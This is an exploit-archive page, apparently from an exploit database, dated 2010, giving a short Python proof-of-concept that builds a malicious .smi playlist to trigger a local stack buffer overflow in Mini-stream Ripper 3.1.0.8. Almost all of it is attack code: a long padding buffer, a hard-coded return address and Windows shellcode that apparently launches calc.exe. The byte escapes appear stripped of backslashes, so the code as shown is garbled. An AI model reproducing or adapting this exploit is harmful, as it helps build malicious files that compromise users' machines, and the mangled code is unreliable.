Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit
# Published : 2010-03-28
# Author : Hazem Mofeed
# Previous Title : ASX to MP3 Converter Version 3.0.0.100 => Local stack overflow exploit
# Next Title : Stud_PE <= v2.6.05 Stack Overflow PoC exploit

# Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit
# Author: Hazem Mofeed
# Download: http://www.mini-stream.net/mini-stream-ripper/download/
# Home: http://hakxer.wordpress.com

# [BUFFER] + [ RET ] + [ RET ] + [SHELLCODE] --> Exploited ..
          # http://www.exploit-db.com/exploits/11607
shellcode = ("xebx16x5bx31xc0x50x53xbbx0dx25x86x7cxffxd3x31xc0"
   "x50xbbx12xcbx81x7cxffxd3xe8xe5xffxffxffx63x61x6c"
   "x63x2ex65x78x65x00") # SP3(sh)

# exploit
exploit = ("x41" * 43496 +  "x08x6Ax83x7C" + "x08x6Ax83x7C" + shellcode )
file = open("exploit.smi","w")
file.write(exploit)
file.close()